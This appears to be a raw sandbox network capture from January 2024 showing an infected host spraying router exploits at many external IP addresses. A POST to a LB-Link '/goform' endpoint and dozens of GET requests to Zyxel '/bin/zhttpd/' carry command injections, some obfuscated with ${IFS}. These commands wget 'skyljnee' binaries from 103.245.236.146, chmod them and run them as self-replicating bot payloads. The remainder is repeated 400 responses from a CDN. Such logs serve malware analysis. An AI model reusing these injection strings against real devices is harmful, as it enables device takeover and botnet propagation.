                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>
                                                Jan 28, 2024 10:16:25.094093084 CET479INHTTP/1.1 400 Bad Request
                                                Server: kngx/1.10.2
                                                Date: Sun, 28 Jan 2024 09:16:23 GMT
                                                Content-Type: text/html
                                                Content-Length: 172
                                                Connection: close
                                                KS-Deny-Reason: client|81.181.57.74|cdnfzct41-cache03.cdnfzct41.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                x-link-via: fzct41:8080;
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>
                                                Jan 28, 2024 10:16:25.303159952 CET479INHTTP/1.1 400 Bad Request
                                                Server: kngx/1.10.2
                                                Date: Sun, 28 Jan 2024 09:16:23 GMT
                                                Content-Type: text/html
                                                Content-Length: 172
                                                Connection: close
                                                KS-Deny-Reason: client|81.181.57.74|cdnfzct41-cache03.cdnfzct41.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                x-link-via: fzct41:8080;
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3858192.168.2.2346014110.80.148.498080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.299202919 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:23.670593023 CET479INHTTP/1.1 400 Bad Request
                                                Server: kngx/1.10.2
                                                Date: Sun, 28 Jan 2024 09:16:23 GMT
                                                Content-Type: text/html
                                                Content-Length: 172
                                                Connection: close
                                                KS-Deny-Reason: client|81.181.57.74|cdnfzct41-cache02.cdnfzct41.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                x-link-via: fzct41:8080;
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3859192.168.2.2335880219.177.56.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779136896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3860192.168.2.2338828195.220.244.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779154062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3861192.168.2.2353254119.71.47.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779174089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3862192.168.2.2342430115.106.89.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779198885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3863192.168.2.233596460.32.34.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779247999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3864192.168.2.2342360201.103.158.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779258966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3865192.168.2.2343190191.13.135.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779259920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3866192.168.2.2337178194.13.94.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779320955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3867192.168.2.233302873.202.13.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779361010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3868192.168.2.2349266168.187.255.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779381990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3869192.168.2.2336706149.93.237.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779417038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3870192.168.2.233946812.184.112.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779444933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3871192.168.2.234902425.65.79.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779489994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3872192.168.2.2359650144.150.119.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779499054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3873192.168.2.2335082221.111.8.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779522896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3874192.168.2.2346688180.205.202.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779548883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3875192.168.2.233294293.10.240.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779566050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3876192.168.2.2345694101.208.8.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779620886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3877192.168.2.2335722158.165.11.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779633999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3878192.168.2.2336416118.218.151.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779676914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3879192.168.2.2348034121.102.187.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779701948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3880192.168.2.2345648174.169.230.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779721975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3881192.168.2.234976894.51.237.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779738903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3882192.168.2.2339862207.240.238.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779781103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3883192.168.2.2335996123.168.164.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779795885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3884192.168.2.2336126204.53.254.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779828072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3885192.168.2.2360368212.137.44.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779877901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3886192.168.2.233992468.62.188.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779902935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3887192.168.2.235916420.204.37.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779917955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3888192.168.2.234969634.126.239.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779928923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3889192.168.2.235590659.218.48.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779948950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3890192.168.2.233705865.172.60.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.779988050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3891192.168.2.234895813.255.134.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780038118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3892192.168.2.2345742204.144.182.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780066967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3893192.168.2.2356106125.157.56.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780073881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3894192.168.2.2336174169.183.204.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780124903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3895192.168.2.235998817.194.29.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780152082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3896192.168.2.2340822168.160.197.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780177116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3897192.168.2.2345110222.4.156.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780198097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3898192.168.2.2341372221.249.235.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780237913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3899192.168.2.2336086165.191.159.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780277967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3900192.168.2.2358354151.237.187.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780318975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3901192.168.2.2360446172.37.106.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780339003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3902192.168.2.236020852.200.153.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780358076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3903192.168.2.2334974138.115.116.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780375004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3904192.168.2.233923247.116.26.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780394077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3905192.168.2.2344360105.107.92.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780416012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3906192.168.2.234559042.203.155.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.780426025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3907192.168.2.2354886108.143.223.64443
                                                TimestampBytes transferredDirectionData
